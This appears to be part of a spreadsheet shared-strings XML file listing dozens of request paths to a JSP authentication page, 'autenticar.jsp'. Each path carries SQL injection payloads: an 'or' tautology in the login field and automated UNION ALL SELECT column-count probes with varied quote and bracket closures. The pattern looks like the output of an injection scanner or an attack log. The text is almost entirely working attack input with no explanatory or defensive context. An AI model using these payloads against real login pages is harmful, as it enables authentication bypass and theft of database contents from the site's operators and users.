    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4528,4528,4528,4528,4528,4528,4528,4528,4528,4528,4528,4528,4528,4528,4528,4528,4528,4528,4528,4528,4528,4528,4528,4528#and'gwcy'like'gwcy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5184,5184,5184,5184,5184,5184,5184,5184,5184,5184,5184,5184,5184,5184,5184,5184,5184,5184,5184,5184,5184,5184,5184,5184,5184#and'uxqe'like'uxqe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432#and'ptrr'like'ptrr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463#and'kdhk'like'kdhk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849,9849#and'tatu'like'tatu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389#and'wjxv'like'wjxv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262,8262#and'bqnf'like'bqnf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8663,8663,8663,8663,8663,8663,8663,8663,8663,8663,8663,8663,8663,8663,8663,8663,8663,8663,8663,8663,8663#and("frdi"="frdi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8203,8203,8203,8203,8203,8203,8203,8203,8203,8203,8203,8203,8203,8203,8203,8203,8203,8203,8203,8203,8203,8203#and("nsac"="nsac</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245#and("lhlt"="lhlt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9364,9364,9364,9364,9364,9364,9364,9364,9364,9364,9364,9364,9364,9364,9364,9364,9364,9364,9364,9364,9364,9364,9364,9364#and("ygrk"="ygrk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect574,574,574,574,574,574,574,574,574,574,574,574,574,574,574,574,574,574,574,574,574,574,574,574,574#and("rqka"="rqka</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482,9482#and("ozcy"="ozcy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477#and("bmqp"="bmqp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634,3634#and("ibxu"="ibxu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257,1257#and("vneu"="vneu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960,4960#and("azit"="azit</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5745,5745,5745,5745,5745,5745,5745,5745,5745,5745,5745,5745,5745,5745,5745,5745,5745,5745,5745,5745,5745#and(("jqww"="jqww</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5291,5291,5291,5291,5291,5291,5291,5291,5291,5291,5291,5291,5291,5291,5291,5291,5291,5291,5291,5291,5291,5291#and(("rnbc"="rnbc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect632,632,632,632,632,632,632,632,632,632,632,632,632,632,632,632,632,632,632,632,632,632,632#and(("yewc"="yewc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730,3730#and(("gvcz"="gvcz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8365,8365,8365,8365,8365,8365,8365,8365,8365,8365,8365,8365,8365,8365,8365,8365,8365,8365,8365,8365,8365,8365,8365,8365,8365#and(("eebq"="eebq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348,2348#and(("ecqf"="ecqf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005,1005#and(("mbxg"="mbxg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793,3793#and(("xrwd"="xrwd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649#and(("etzb"="etzb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765,7765#and(("nhts"="nhts</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4422,4422,4422,4422,4422,4422,4422,4422,4422,4422,4422,4422,4422,4422,4422,4422,4422,4422,4422,4422,4422#and((("uxth"="uxth</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect1861,1861,1861,1861,1861,1861,1861,1861,1861,1861,1861,1861,1861,1861,1861,1861,1861,1861,1861,1861,1861,1861#and((("ppvu"="ppvu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834#and((("qzzt"="qzzt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2673,2673,2673,2673,2673,2673,2673,2673,2673,2673,2673,2673,2673,2673,2673,2673,2673,2673,2673,2673,2673,2673,2673,2673#and((("irls"="irls</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308#and((("edxy"="edxy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116,6116#and((("jnfs"="jnfs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930,7930#and((("qjhl"="qjhl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434,3434#and((("hrzk"="hrzk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971,1971#and((("eudv"="eudv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202,8202#and((("omku"="omku</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5371,5371,5371,5371,5371,5371,5371,5371,5371,5371,5371,5371,5371,5371,5371,5371,5371,5371,5371,5371,5371#and"pdqp"="pdqp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8822,8822,8822,8822,8822,8822,8822,8822,8822,8822,8822,8822,8822,8822,8822,8822,8822,8822,8822,8822,8822,8822#and"haty"="haty</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8548,8548,8548,8548,8548,8548,8548,8548,8548,8548,8548,8548,8548,8548,8548,8548,8548,8548,8548,8548,8548,8548,8548#and"fcfu"="fcfu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133#and"dayy"="dayy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752#and"hquv"="hquv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354,3354#and"baxl"="baxl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902,7902#and"bnle"="bnle</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769,8769#and"ezav"="ezav</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643,5643#and"fwdv"="fwdv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280#and"xymz"="xymz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect7170,7170,7170,7170,7170,7170,7170,7170,7170,7170,7170,7170,7170,7170,7170,7170,7170,7170,7170,7170,7170#and("qgpv"like"qgpv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831#and("epqo"like"epqo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176#and("olcs"like"olcs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864#and("gqbq"like"gqbq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6724,6724,6724,6724,6724,6724,6724,6724,6724,6724,6724,6724,6724,6724,6724,6724,6724,6724,6724,6724,6724,6724,6724,6724,6724#and("xhtz"like"xhtz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616,5616#and("buns"like"buns</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194,8194#and("edtt"like"edtt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091#and("qmvz"like"qmvz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120,1120#and("atkr"like"atkr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570#and("kijg"like"kijg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400#and(("kwqm"like"kwqm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3972,3972,3972,3972,3972,3972,3972,3972,3972,3972,3972,3972,3972,3972,3972,3972,3972,3972,3972,3972,3972,3972#and(("ylub"like"ylub</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect7713,7713,7713,7713,7713,7713,7713,7713,7713,7713,7713,7713,7713,7713,7713,7713,7713,7713,7713,7713,7713,7713,7713#and(("sehe"like"sehe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1919,1919,1919,1919,1919,1919,1919,1919,1919,1919,1919,1919,1919,1919,1919,1919,1919,1919,1919,1919,1919,1919,1919,1919#and(("fyml"like"fyml</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987#and(("chdt"like"chdt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753,1753#and(("vorp"like"vorp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect765,765,765,765,765,765,765,765,765,765,765,765,765,765,765,765,765,765,765,765,765,765,765,765,765,765,765#and(("hdii"like"hdii</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249#and(("rnyk"like"rnyk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656,2656#and(("vhrs"like"vhrs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928,8928#and(("rvrf"like"rvrf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2361,2361,2361,2361,2361,2361,2361,2361,2361,2361,2361,2361,2361,2361,2361,2361,2361,2361,2361,2361,2361#and((("bwqg"like"bwqg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4255,4255,4255,4255,4255,4255,4255,4255,4255,4255,4255,4255,4255,4255,4255,4255,4255,4255,4255,4255,4255,4255#and((("dpvq"like"dpvq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002#and((("dtdc"like"dtdc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489#and((("ajad"like"ajad</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9216,9216,9216,9216,9216,9216,9216,9216,9216,9216,9216,9216,9216,9216,9216,9216,9216,9216,9216,9216,9216,9216,9216,9216,9216#and((("axjc"like"axjc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638,7638#and((("rzfu"like"rzfu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683#and((("xgif"like"xgif</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258,3258#and((("hpjv"like"hpjv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665,6665#and((("zshd"like"zshd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807,7807#and((("oemo"like"oemo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect772,772,772,772,772,772,772,772,772,772,772,772,772,772,772,772,772,772,772,772,772#and"npgz"like"npgz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4578,4578,4578,4578,4578,4578,4578,4578,4578,4578,4578,4578,4578,4578,4578,4578,4578,4578,4578,4578,4578,4578#and"yvos"like"yvos</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5092,5092,5092,5092,5092,5092,5092,5092,5092,5092,5092,5092,5092,5092,5092,5092,5092,5092,5092,5092,5092,5092,5092#and"jfie"like"jfie</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1655,1655,1655,1655,1655,1655,1655,1655,1655,1655,1655,1655,1655,1655,1655,1655,1655,1655,1655,1655,1655,1655,1655,1655#and"kjvb"like"kjvb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459#and"oejx"like"oejx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127#and"jwdm"like"jwdm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754,7754#and"blvg"like"blvg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381,2381#and"qwmk"like"qwmk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274,4274#and"tjjr"like"tjjr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439#and"anuy"like"anuy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#and(3126=3126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#and(2312=2312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#and(816=816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#and(2462=2462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#and(2546=2546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#and(3010=3010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#and(6034=6034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#and(523=523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#and(1973=1973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#and(179=17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#and((2379=237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#and((1432=1432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#and((8780=8780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#and((4975=4975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#and((1768=1768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#and((9563=9563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#and((7511=7511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#and((4075=4075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#and((7940=7940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#and((256=256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#and(((2010=2010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#and(((3828=3828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#and(((3373=3373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#and(((6607=6607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#and(((1449=1449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#and(((5897=5897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#and(((4416=4416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#and(((9221=9221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#and(((2354=2354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#and(((3888=3888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#and('gfhg'='gfhg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#and('bidq'='bidq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#and('ercq'='ercq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#and('coxe'='coxe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#and('wrzf'='wrzf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#and('jqdr'='jqd